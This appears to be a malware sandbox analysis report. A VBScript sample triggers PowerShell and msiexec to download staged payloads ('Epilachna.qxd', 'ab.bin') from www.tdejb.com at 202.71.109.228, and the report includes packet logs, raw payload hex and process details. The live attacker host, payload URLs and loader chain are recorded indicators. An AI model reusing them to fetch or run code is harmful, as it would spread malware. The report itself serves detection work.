Dec 19, 2024 12:47:33.990519047 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.002850056 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.003266096 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.012034893 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.012221098 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.021560907 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.021740913 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.030997992 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.031104088 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.043162107 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.043297052 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.071516991 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.071855068 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.074457884 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.074568987 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.076122046 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.076272011 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.083658934 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.083849907 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.094505072 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.094647884 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.103841066 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.103955030 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.113439083 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.113545895 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.122723103 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.122852087 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.179712057 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.179867029 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.215159893 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.215321064 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.219960928 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.220161915 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.226085901 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.226186991 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.233784914 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.233983040 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.237265110 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.237394094 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.240400076 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.240509987 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:34.244358063 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:34.244503021 CET  49731        443        192.168.2.4      202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.247548103 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.247675896 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.250955105 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.251339912 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.254100084 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.254177094 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.258198023 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.258275986 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.261146069 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.261354923 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.265067101 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.265274048 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.268420935 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.268496037 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.271716118 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.271879911 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.368473053 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.368573904 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.371547937 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.371690035 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.408603907 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.408855915 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.411638975 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.411739111 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.414741039 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.414920092 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.475017071 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.475136042 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.704916954 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.704927921 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.705015898 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.707057953 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.707461119 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.710582972 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.710659027 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.713402987 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.713481903 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.938133955 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.938148975 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.938277006 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:35.860796928 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:35.860831976 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:35.860913992 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:35.860913992 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.379796982 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.379811049 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.379903078 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.613148928 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.613248110 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.613281012 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.613347054 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.616476059 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.719304085 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.719351053 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:59.719424009 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.729753017 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.729774952 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.409054041 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.409308910 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.461263895 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.461286068 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.461661100 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.461766958 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.466075897 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.507352114 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.247817993 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.247840881 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.248013973 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.248034000 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.248075962 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.459754944 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.459767103 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.459850073 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.486913919 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.487020969 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.512300968 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.512459040 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.538041115 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.538151026 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.699623108 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.700051069 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.715873957 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.715992928 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.738753080 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.738830090 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.756475925 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.756577015 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.773485899 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.773619890 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.796633005 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.796890020 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.813730955 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.813910961 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.926156998 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.926337004 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.937684059 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.937786102 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.952408075 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.952620983 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.958390951 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.958503962 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.964690924 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.964761019 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.970912933 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.971019983 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.978898048 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.979023933 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.985336065 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.985641956 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.991416931 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.991517067 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.999414921 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.999644041 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.004791021 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.005125046 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.044416904 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.044581890 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.049556971 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.049670935 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.118295908 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.118380070 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.126032114 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.126203060 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.160994053 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.161113977 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.166394949 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.166479111 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.170615911 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.170707941 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.174485922 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.174566031 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.177628994 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.177709103 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.180885077 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.180970907 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.184942961 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.185029984 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.190332890 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.190443039 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.191900015 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.191968918 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.195846081 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.195940971 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.198713064 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.198801041 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.202358007 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.202428102 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.206371069 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.206453085 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.209889889 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.209971905 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.308868885 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.308938026 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.311440945 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.311554909 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.349874020 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.350022078 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.352992058 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.353059053 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.356210947 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.356266975 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.419239044 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.419446945 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.422261953 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.422674894 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.652606964 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.652621984 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.652709961 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.652709961 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.655322075 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.655459881 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.658610106 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.658675909 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.661643028 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.661854982 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.884062052 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.884097099 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.884171963 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.884171963 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.890650988 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.890723944 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.894628048 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.894764900 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334203959 CET44349738202.71.109.228192.168.2.4
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 12:47:29.848903894 CET | 59001 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 12:47:30.756105900 CET | 53 | 59001 | 1.1.1.1 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 12:47:29.848903894 CET | 192.168.2.4 | 1.1.1.1 | 0x816d | Standard query (0) | www.tdejb.com | A (IP address) | IN (0x0001) | false

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 12:47:30.756105900 CET | 1.1.1.1 | 192.168.2.4 | 0x816d | No error (0) | www.tdejb.com | tdejb.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:47:30.756105900 CET | 1.1.1.1 | 192.168.2.4 | 0x816d | No error (0) | tdejb.com | (none) | 202.71.109.228 | A (IP address) | IN (0x0001) | false
                                                                                  • www.tdejb.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 202.71.109.228 | 443 | 5752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:47:32 UTC | 173 | OUT | GET /kp/Epilachna.qxd HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.tdejb.com
    Connection: Keep-Alive
2024-12-19 11:47:33 UTC | 232 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 11:47:32 GMT
    Server: Apache
    Last-Modified: Fri, 13 Dec 2024 02:53:05 GMT
    Accept-Ranges: bytes
    Content-Length: 460072
    Connection: close
    Content-Type: application/vnd.quark.quarkxpress


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 202.71.109.228 | 443 | 5948 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:48:01 UTC | 167 | OUT | GET /ab/ab.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.tdejb.com
    Cache-Control: no-cache
2024-12-19 11:48:02 UTC | 223 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 11:48:01 GMT
    Server: Apache
    Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
    Accept-Ranges: bytes
    Content-Length: 449600
    Connection: close
    Content-Type: application/octet-stream
                                                                                  Data Ascii: ^4y>Y_n}|R9:&8"4tbM)6<cN&4if64r/=\V"vgah#9/-h]oELxny7s9 Me`X_;KQIxMm`!D7OghRW2auT 2(Gd>59@!F|h@M@)
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 01 b0 75 a0 8f 57 29 8c 6f 5e e2 fc 7a 57 c0 cc d7 d6 69 93 7e a4 92 1a de 46 22 f8 10 65 e9 14 75 7c ad 6f fc 33 b3 3e fc 6f fb 11 54 07 d5 de 01 aa e3 22 03 18 2c 88 bc 3e ad d7 2c 6b 3b 0a c2 73 2d 0e ac 2d b6 b0 f8 3b e3 2f 2b 0f a8 f9 cb 7f 10 d3 e9 7d 92 c1 bb 10 15 4b 85 99 14 35 05 04 ba 3e c6 d5 d8 f5 ce 95 83 0b af 80 27 57 d6 5f b9 f3 a5 ce 70 ea 48 24 eb 2a eb 06 7e 68 1f d4 e2 6d 29 e7 ef 09 b4 4c 57 3a 1f d9 ac 4a 11 84 74 7d 7f df 59 f5 2b 5f 1e 89 ef 1d c4 64 f1 20 a3 dd a8 36 48 5f ff 9f 9d 0e 84 04 aa 8d 2a d4 30 ab 91 c4 33 a3 24 bb f3 41 30 03 d5 ed 8a b4 4a 42 43 8c 67 16 91 dd 15 a6 a3 3f 9d 58 24 a6 a7 8a 70 19 0c 3f 89 31 09 d5 e8 f7 df 10 76 80 4f 23 6c 2e 18 45 af 60 47 52 f5 3d 5f ee 3a 78 2a ae 5d 52 d9 c4 3d 3b 37 37 ab 08 61
                                                                                  Data Ascii: uW)o^zWi~F"eu|o3>oT",>,k;s--;/+}K5>'W_pH$*~hm)LW:Jt}Y+_d 6H_*03$A0JBCg?X$p?1vO#l.E`GR=_:x*]R=;77a
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: 02 41 ff ae ab 1b 6d ae 55 91 14 fd d6 c7 1b 06 b8 51 7c f9 56 87 d5 14 ab d5 77 6d 45 97 63 00 e4 99 19 44 cc 09 80 d2 f3 eb d9 2f bc af dc 6b 3d f4 f6 a3 b7 53 d4 53 c6 86 81 7b 2b b8 56 ed 83 30 a0 c0 40 10 ef 5f b2 9d 48 b6 d0 a7 00 2a 6d 58 46 ba d6 b7 dd 53 65 23 54 22 b4 e6 d1 57 86 54 cc ce dd 51 cb 61 2e d0 20 49 c0 1d 02 ab 00 75 66 95 4a 5b bc 55 df cd 28 2b fd 7a 4d 3c 55 4d 52 27 c3 4d 37 cb a4 d3 15 e1 58 94 34 99 3e ac c8 09 66 e5 38 a8 b7 89 2c 0e 6c 8e 46 65 a1 2e 3b 27 bb 3a 4b 01 75 fb 03 6d ed 31 7c 8f 42 3f 6d a5 fa a7 2b 22 7b fa 6f 1c f2 9e 6b a6 94 94 0f 4d b3 69 65 e2 70 49 8c 75 61 a4 ae 8e 85 2f 34 51 c0 25 2a b2 ee 95 0a 4b 46 44 2b 71 7f fe 13 1e b1 e1 33 db 28 b8 00 8c 49 b9 1a 96 92 0c 83 1e fd fe 67 63 29 72 b4 40 b2 01 51
                                                                                  Data Ascii: AmUQ|VwmEcD/k=SS{+V0@_H*mXFSe#T"WTQa. IufJ[U(+zM<UMR'M7X4>f8,lFe.;':Kum1|B?m+"{okMiepIua/4Q%*KFD+q3(Igc)r@Q
                                                                                  2024-12-19 11:48:02 UTC8000INData Raw: d3 f5 8c f0 02 82 cc ae c5 7f b7 4d 26 2f 5c ec f1 37 6d d9 1c 4f 30 f8 e6 6d 21 6f 25 35 48 9e 3e 24 d7 43 8a 87 2c 4b 93 c9 9d a0 18 5c f8 e9 b2 7a e0 ee d5 54 f1 3e d4 3c 7f 15 93 5d 4f 03 29 ba a6 54 28 ae 16 8c eb 86 93 b7 02 14 11 84 1d cc 4a 5e 05 0f 05 fd 42 94 37 d7 a9 45 cc b2 48 85 cd bd e3 53 df 24 e0 b8 fd b0 f7 05 ea df 43 e4 f1 a3 01 52 24 2c 5f 32 4e 67 72 35 22 08 43 82 9f aa aa 32 10 49 48 bd a5 9e 15 a5 e5 b7 98 d2 71 40 f5 d3 47 a5 d0 d2 fb 77 62 0f 35 7c 79 60 02 54 e9 58 7e b0 4d f2 e8 78 9c 69 a5 86 46 26 24 70 7a 07 23 3b 6a 04 f9 b4 91 72 2c 53 8f a2 2c 9f ea f3 a8 37 bd 5d 6a bf 7c 7d d8 34 6d 61 6f 5c b1 5f a6 b3 0f c6 ff 25 ab 76 b6 e7 e3 b1 91 c9 89 9f 4a 98 65 47 da 85 c3 64 6f 82 bc bb fb ea 38 62 96 54 78 9f bc 2c e1 71 52
                                                                                  Data Ascii: M&/\7mO0m!o%5H>$C,K\zT><]O)T(J^B7EHS$CR$,_2Ngr5"C2IHq@Gwb5|y`TX~MxiF&$pz#;jr,S,7]j|}4mao\_%vJeGdo8bTx,qR



                                                                                  Target ID:0
                                                                                  Start time:06:47:17
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs"
                                                                                  Imagebase:0x7ff6b0060000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:06:47:21
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic diskdrive get caption,serialnumber
                                                                                  Imagebase:0x7ff73cea0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:06:47:21
                                                                                  Start date:19/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
